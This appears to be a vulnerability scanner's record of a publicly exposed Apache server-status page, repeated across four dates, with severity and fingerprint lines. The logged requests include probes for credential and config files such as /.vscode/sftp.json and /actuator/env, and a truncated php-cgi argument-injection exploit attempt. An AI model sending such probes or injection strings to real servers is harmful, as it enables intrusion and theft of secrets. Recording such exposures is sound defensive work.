Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 12-Dec-2025 00:19:46 CET Restart Time: Friday, 05-Dec-2025 09:04:50 CET Parent Server Config. Generation: 37 Parent Server MPM Generation: 36 Server uptime: 6 days 15 hours 14 minutes 55 seconds Server load: 0.06 0.05 0.06 Total accesses: 238395 - Total Traffic: 6.9 GB - Total Duration: 245596174 CPU Usage: u35.77 s35.63 cu1259.85 cs636.58 - .343% CPU load .416 requests/sec - 12.5 kB/second - 30.1 kB/request - 1030.21 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 04096705no2yes010001 14096560no0yes010000 24096561no0yes010000 34096559no1yes19000 44096562no0yes010000 Sum503 149001 ______________________________________W___________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3640967050/231/4010_ 13.472036383560.04.9493.62 119.42.144.140http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3640967050/234/3861_ 13.30266638905550.05.74146.39 172.64.217.107h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3640967050/251/3933_ 13.483030760220.04.4774.24 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-3640967050/265/3957_ 13.471028046040.08.31160.76 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-3640967050/240/4021_ 13.487032729890.013.4893.59 172.71.124.159h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3640967050/264/4134_ 13.472030475520.04.7991.66 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-3640967050/236/3875_ 13.476043406200.024.11110.76 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-3640967050/247/3980_ 13.484029503670.04.84118.66 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3640967050/256/3905_ 13.487029367320.04.00129.43 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-3640967050/226/3999_ 13.4541840904940.027.00117.19 195.76.176.6h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3640965600/9/6802_ 5.191345065409410.00.01212.55 172.71.31.226h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3640965600/3/6750_ 4.4613430119661910.00.09190.80 172.68.12.192h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3640965600/3/6798_ 2.80134341578135250.00.03208.46 104.23.251.83h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3640965600/3/6688_ 2.96134352162869830.00.03182.94 172.70.254.186h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3640965600/6/6858_ 5.191340072098140.00.03246.70 104.22.1.77h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3640965600/9/6921_ 5.181343076887090.010.59222.39 104.22.1.156h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3640965600/5/6927_ 5.181343073925040.00.06244.64 104.22.1.198h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3640965600/3/6725_ 4.85134031889178480.00.03166.82 162.158.163.240h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3640965600/7/6798_ 5.181344051349510.01.66174.20 104.22.1.166h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3640965600/5/6957_ 5.181345053082330.00.11193.89 104.22.1.77h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3640965610/10/4069_ 5.06135038977940.00.4697.32 104.22.24.98h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3640965610/9/4168_ 5.00136132583440.00.14125.63 199.45.155.66http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3640965610/10/4101_ 5.49140031730710.00.26151.01 162.158.41.231h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3640965610/7/4092_ 5.49141130204190.00.1880.65 162.158.42.176h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3640965610/7/4074_ 5.06135045823300.00.0394.42 172.71.31.158h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3640965610/12/4075_ 4.7213634630489760.00.27136.31 199.45.155.66http/1.1 2-3640965610/7/4077_ 5.4136933129863140.00.03134.36 104.23.175.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3640965610/5/3999_ 5.30364131149120.00.0192.47 172.68.111.59h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3640965610/6/4187_ 5.3114139330188900.00.06128.37 104.23.219.92h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-3640965610/5/3955_ 5.06364030373790.00.0583.67 108.162.238.73h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3640965590/158/2853_ 11.0931725359430.03.12116.50 172.68.134.213h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3640965590/144/2930_ 11.141084990400.02.96121.96 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-3640965590/165/2871_ 11.0612424569770.03.3177.92 188.114.111.208h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3640965590/161/2972_ 11.1221025832110.02.7764.72 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 3-3640965590/160/2849_ 11.132024840500.02.14131.97 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-3640965590/146/2849_ 11.126024246880.02.57148.64 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-3640965590/153/2840_ 10.98211826403340.010.10126.62 188.114.111.93h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3640965590/163/2783_ 11.1222023899010.02.70104.25 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 3-3640965590/150/2945W 10.760024694630.02.93117.85 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-3640965590/161/2796_ 11.08211423294150.02.3586.93 43.157.170.13http/1.1relehse.com:443GET / HTTP/1.1 4-3640965620/7/6023_ 5.25665155621780.00.01153.89 172.68.111.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3640965620/4/6090_ 5.00660056009480.00.01150.56 104.22.24.11h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3640965620/3/6253_ 4.05665129777352330.00.00154.54 104.23.166.75h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3640965620/5/6093_ 4.99660091411650.00.08180.57 172.68.70.205h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3640965620/6/6115_ 5.412092351268710.00.01151.56 188.114.111.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3640965620/2/6046_ 3.832
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802c6dbfb94
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 11-Dec-2025 00:22:30 CET Restart Time: Friday, 05-Dec-2025 09:04:50 CET Parent Server Config. Generation: 33 Parent Server MPM Generation: 32 Server uptime: 5 days 15 hours 17 minutes 40 seconds Server load: 0.06 0.08 0.08 Total accesses: 193564 - Total Traffic: 5.2 GB - Total Duration: 215365207 CPU Usage: u52.52 s44.58 cu985.65 cs508.76 - .327% CPU load .397 requests/sec - 11.2 kB/second - 28.1 kB/request - 1112.63 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03968783no1yes010001 13968648no0yes010000 23968649no1yes19000 33968647no1yes010000 43968650no0yes010000 Sum503 149001 _________________________W________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3239687830/276/3010_ 23.183029342490.08.0873.17 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3239687830/279/2871_ 23.191030376500.018.82119.62 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3239687830/286/2915_ 23.191023496670.07.9054.26 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-3239687830/267/2887_ 23.181020340200.022.99137.17 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 0-3239687830/257/2991_ 23.1618024322460.010.1563.16 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-3239687830/285/3099_ 23.1415523130090.08.4071.94 94.250.251.7http/1.1barrerasdecontencion.com:443GET /wp-json/ldlms/v2/users HTTP/1.1 0-3239687830/249/2892_ 23.189036395330.04.8268.15 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 0-3239687830/295/2959_ 23.1712022699410.06.9797.28 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 0-3239687830/281/2878_ 23.1812021489250.06.2684.72 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-3239687830/291/2976_ 23.189033664580.09.2369.78 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-3239686480/11/5572_ 8.981822059330120.010.72154.11 172.68.26.44h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/12/5552_ 8.9918850114081600.00.19148.42 172.69.65.87h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/14/5644_ 8.991885072268210.00.18159.38 198.41.227.26h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/9/5499_ 8.99374057385980.01.82148.98 172.71.174.153h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/11/5670_ 8.791822066144010.00.94155.44 172.71.82.57h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/13/5633_ 9.03182748270627700.00.32163.43 104.23.245.27h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/15/5750_ 9.50379168254480.06.95161.74 104.23.237.85h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/14/5634_ 8.991886083691540.01.37138.83 172.68.26.58h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/6/5560_ 8.98379045644610.00.01141.54 162.159.104.26h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3239686480/11/5768_ 8.98373047950670.00.65126.39 162.158.175.203h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3239686490/243/3624_ 20.1036535964820.05.4886.11 92.205.48.162http/1.1 2-3239686490/280/3685_ 20.186029031400.04.86101.93 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3239686490/270/3656_ 20.174028709040.06.51141.90 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-3239686490/261/3618_ 20.187027049530.05.2071.45 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-3239686490/274/3616_ 20.176042783840.06.1885.14 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-3239686490/274/3616W 20.180027381610.06.06105.03 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-3239686490/284/3612_ 20.177027177780.08.72123.43 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-3239686490/266/3541_ 20.195027471850.06.0875.50 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-3239686490/270/3646_ 20.193026396380.05.26102.95 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-3239686490/272/3505_ 20.172027243450.010.1675.45 68.183.9.16http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-3239686470/15/2026_ 9.333517819549680.01.5284.60 178.162.235.197http/1.1barrerasdecontencion.com:443GET /wp-json/Wp/v2/users HTTP/1.1 3-3239686470/20/2091_ 8.8010622179405720.00.5279.91 172.68.134.211h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/13/2035_ 8.81350019561640.00.1262.67 178.162.235.197http/1.1 3-3239686470/18/2084_ 8.791061020058260.00.5741.74 172.69.67.66h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/14/2005_ 8.811067019400970.00.88115.13 172.71.166.58h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/12/1955_ 9.1978014918574420.00.1898.60 145.239.10.137http/1.1barrerasdecontencion.com:443GET /resp.php HTTP/1.1 3-3239686470/17/2018_ 9.471618719870690.00.1384.18 172.68.23.191h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/10/1941_ 8.80780018322640.00.1178.48 198.41.227.196h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/16/2091_ 9.0811618773830.00.1053.36 104.22.17.250h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3239686470/10/1966_ 8.2811017889240.00.1064.06 172.68.50.33h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3239686500/13/5062_ 8.491886047585460.00.13112.86 172.71.167.137h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3239686500/14/5117_ 8.96378148667680.00.41106.10 104.23.237.73h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3239686500/19/5266_ 8.47378069339010.00.25116.59 172.70.94.195h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3239686500/12/5159_ 8.49373083940850.00.51155.38 162.158.174.17h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3239686500/11/5173_ 8.48373043517180.00.16118.82 198.41.227.23h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3239686500/9/5107_ 8.481886075022400.00.01123.64 162.159.106.149h2lcftech.es:443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a8580263b2cc6c
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 09-Dec-2025 23:06:18 CET Restart Time: Friday, 05-Dec-2025 09:04:50 CET Parent Server Config. Generation: 26 Parent Server MPM Generation: 25 Server uptime: 4 days 14 hours 1 minute 28 seconds Server load: 0.35 0.69 0.57 Total accesses: 146110 - Total Traffic: 4.0 GB - Total Duration: 187775457 CPU Usage: u116.06 s59.73 cu702.09 cs369.42 - .315% CPU load .369 requests/sec - 10.7 kB/second - 29.0 kB/request - 1285.17 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03762309no0yes010000 13762311no1yes19001 23762413no0yes010000 33762310no0yes010000 43762442no0yes010000 Sum501 149001 ___________________W______________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2537623090/63/1188_ 15.585462814096250.01.6038.15 172.69.85.151h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537623090/69/1160_ 15.5011851613599800.01.6751.13 172.71.11.19h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537623090/51/1130_ 15.4511850314377600.01.0021.85 172.69.46.157h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537623090/58/1145_ 15.6012346414081050.01.5056.81 172.71.144.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537623090/69/1216_ 15.3414250414791060.01.1523.44 104.23.175.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537623090/57/1174_ 15.585436914563580.07.3332.02 172.70.250.182h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537623090/58/1159_ 15.4714248628632600.02.3032.47 172.70.142.209h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537623090/57/1182_ 15.3014248614512250.01.2260.26 172.70.142.208h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-2537623090/57/1127_ 15.3614118213329550.00.9933.08 172.70.34.82h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2537623090/76/1188_ 15.635947515661380.02.3026.80 162.158.108.57h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2537623110/701/4229_ 53.352053251130.029.33126.02 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-2537623110/713/4280_ 53.3410105981150.017.45112.76 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-2537623110/709/4283_ 53.342062585270.036.39116.67 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-2537623110/712/4221_ 53.343050521690.036.28121.73 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-2537623110/713/4298_ 53.321156206580.024.17136.49 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-2537623110/694/4299_ 53.353062937210.021.55128.34 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-2537623110/722/4332_ 53.361061905990.036.32118.91 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-2537623110/735/4356_ 53.361076368770.028.56119.12 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2537623110/735/4265_ 53.334038052900.015.48112.68 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 1-2537623110/733/4335W 53.340039385860.035.56107.34 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-2537624130/668/3159_ 46.519033788950.011.8275.42 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-2537624130/662/3178_ 46.518026933180.016.5685.92 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-2537624130/727/3192_ 46.507026923630.025.57132.31 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 2-2537624130/694/3120_ 46.5114025231230.016.8060.67 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-2537624130/600/3132_ 46.41141840860950.021.4371.29 188.114.111.208h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2537624130/655/3116_ 46.5015025343150.029.9791.60 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 2-2537624130/621/3109_ 46.45949425088370.026.12111.46 172.68.19.119h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2537624130/630/3070_ 46.46642825410810.017.5661.38 172.70.142.209h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2537624130/653/3156_ 46.518024303520.028.6692.63 206.189.95.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-2537624130/630/3025_ 46.251346625288750.018.3062.05 172.71.144.17h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537623100/48/1928_ 14.0811847919287100.01.3379.57 162.159.103.145h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537623100/62/1975_ 14.0311348679094850.01.9074.88 162.158.211.10h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537623100/58/1958_ 14.0014350419395420.01.9158.93 162.158.211.9h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537623100/57/1986_ 13.80200019669620.01.6539.41 172.71.144.75h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537623100/53/1905_ 13.93113125719067400.01.35100.55 104.23.162.116h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537623100/54/1864_ 14.0714848618367090.01.0294.99 172.71.82.53h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537623100/60/1927_ 14.0518757819570250.01.2081.89 162.158.81.159h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537623100/43/1860_ 13.79143018109420.02.5076.61 172.71.164.115h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537623100/59/1992_ 13.9718242818506370.01.7851.54 162.158.88.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2537623100/43/1868_ 13.8818258417604680.01.7459.18 104.23.175.17h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2537624420/241/4137_ 25.7720055744306680.06.6496.01 172.71.238.116h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2537624420/251/4071_ 25.8111050745064540.010.1280.16 172.64.222.84h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2537624420/259/4139_ 25.25198064302180.08.6493.83 172.68.193.189h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2537624420/257/4103_ 25.6611088380377490.028.93123.09 162.158.88.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2537624420/221/4089_ 25.8511583239917310.04.5499.34 172.70.108.229h2tandemsl.com:443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802617169c0
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 06-Dec-2025 02:14:08 CET Restart Time: Friday, 05-Dec-2025 09:04:50 CET Parent Server Config. Generation: 3 Parent Server MPM Generation: 2 Server uptime: 17 hours 9 minutes 18 seconds Server load: 2.75 2.62 2.44 Total accesses: 29106 - Total Traffic: 843.5 MB - Total Duration: 26447082 CPU Usage: u27.65 s22.1 cu95.8 cs37.55 - .296% CPU load .471 requests/sec - 14.0 kB/second - 29.7 kB/request - 908.647 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0380624no0yes010000 1380625no0yes19000 2380626no2yes010000 3380627no0yes010000 4380783no0yes010000 Sum502 149000 _____________W____________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-23806240/18/261_ 5.6230303497840.00.1812.12 35.216.140.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-23806240/15/239_ 4.5730872697520.00.0218.26 121.127.34.106http/1.1cinre-viewer.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-23806240/15/246_ 6.7027502897270.00.115.54 104.23.254.71h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-23806240/14/224_ 6.1430302737620.00.164.19 198.41.230.203h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-23806240/19/241_ 6.6830803727200.00.335.13 172.69.39.28h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-23806240/14/239_ 6.1527002933280.00.127.87 198.41.231.96h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-23806240/16/244_ 6.4330302679320.00.2215.49 95.214.52.170http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST / HTTP/1.1 0-23806240/16/250_ 6.1427502728260.00.845.63 104.23.237.16h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-23806240/11/221_ 6.6527032694090.00.105.64 103.23.61.80http/1.1barrerasdecontencion.com:443POST /wp-cron.php?doing_wp_cron=1764983227.77878403663635253906 0-23806240/18/242_ 6.1542002983090.00.286.34 198.41.230.95h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-23806250/222/505_ 15.00102430880.011.6618.03 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 1-23806250/249/531_ 15.02102734970.06.8014.35 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-23806250/265/558_ 15.00402326840.012.4418.78 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-23806250/256/541W 15.00002313240.08.7115.79 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-23806250/240/515_ 15.00602746530.030.3535.26 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-23806250/252/553_ 15.00302749160.010.2117.74 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 1-23806250/240/535_ 15.01302325760.04.859.24 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-23806250/258/529_ 15.02102373830.07.7012.94 